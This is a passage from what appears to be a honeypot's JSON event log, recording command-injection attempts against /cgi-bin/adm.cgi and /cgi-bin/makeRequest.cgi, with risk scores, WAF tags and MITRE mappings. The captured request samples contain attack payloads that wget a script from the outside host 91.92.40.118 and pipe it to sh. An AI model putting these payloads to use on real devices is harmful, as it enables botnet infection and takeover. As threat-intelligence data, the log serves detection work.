\u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022bf38ea8cef8d51c26c553a16765c473947b2c4c8\u0022, \u0022event_fingerprint\u0022: \u0022cecb907eb30b0d83ae6159722b5e2f2712679c21\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022901cc81ecec25fdcd5410a308c336d4e\u0022, \u0022path_pattern_hash\u0022: \u00224861580e8d67a9feec8ee9a93d4f87e4\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nCon\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConnection: close\\r\\n\\r\\nreboot_enabled=1\u0026reboot_time=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr3;busybox wget http:\/\/91.9\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nCon\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConnection: close\\r\\n\\r\\nreboot_enabled=1\u0026reboot_time=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr3;busybox wget http:\/\/91.9\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nCon\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00228016ee8beed5490a5caae76375d3a16c22f9ffbf\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nCon\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/adm.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/adm.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nCon\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":332},{"id":11809700,"ip":"45.153.34.252","ts":"2026-07-14 02:29:50.000000","proto":"tcp","src_port":35676,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":20,"waf_tags":"[\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/makeRequest.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00222987d81543152395f8d92ae32869bdb75f8740c3\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 185, \u0022payload_entropy\u0022: 5.201922631527612, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 88.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 63, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022724d4c1628df264ccc9523b112ab1e7088984a92\u0022, \u0022event_fingerprint\u0022: \u00228490f84ad3b5dc0942f79e940b7c552d01bdce91\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 224, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 63}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022b72d9c923e41800c313fb48dec4f2446\u0022, \u0022path_pattern_hash\u0022: \u00229e07efe7b4bc2ac9c18d5d90eb43e4ff\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 63}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: \u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022waf_tags\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022rce-5\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\\r\\nConnection: close\\r\\n\\r\\ndate=wget 91.92.40.118\/r|sh -s w\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022waf_tags\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022rce-5\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\\r\\nConnection: close\\r\\n\\r\\ndate=wget 91.92.40.118\/r|sh -s w\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00225ad6abcc6e201e09c28ae11eea2e19a32d785d31\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/makeRequest.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 63\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 63}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 63, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/makeRequest.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 88 \u00b7 3 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":185},{"id":11809698,"ip":"45.153.34.252","ts":"2026-07-14 